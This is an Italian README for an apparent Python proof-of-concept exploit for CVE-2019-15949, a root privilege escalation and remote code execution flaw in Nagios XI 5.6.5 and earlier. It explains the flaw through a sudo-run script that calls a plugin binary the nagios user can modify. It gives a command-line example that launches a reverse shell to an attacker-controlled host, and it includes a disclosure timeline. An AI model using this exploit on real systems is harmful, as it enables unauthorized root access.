
una PoC per la rce di Nagios CVE-2019-15949 in python
un PoC Python per la CVE-2019-15949
Esiste una vulnerabilità in Nagios XI <= 5.6.5 che consente a un attaccante di sfruttare una RCE per elevare i privilegi a root. L'exploit richiede l'accesso al server come utente 'nagios', oppure l'accesso CCM tramite interfaccia web con permessi per gestire i plugin.
Lo script getprofile.sh, richiamato scaricando un profilo di sistema (profile.php?cmd=download), viene eseguito come root tramite una voce sudo senza password; lo script esegue l'eseguibile 'check_plugin' che è di proprietà dell'utente nagios. Un utente autenticato in Nagios XI con permessi per modificare i plugin, oppure l'utente 'nagios' sul server, può modificare l'eseguibile 'check_plugin' e inserire comandi dannosi eseguibili come root.
È stato sviluppato un POC PHP che carica un payload che produce una reverse shell come root. Utilizzo:
python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport
esempio:
python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444
Segnalata a Nagios il: 29 luglio 2019 Confermata da Nagios il: 29 luglio 2019 Corretta nella versione: 5.6.6 il: 20 agosto 2019 CVE assegnata il: 6 settembre 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)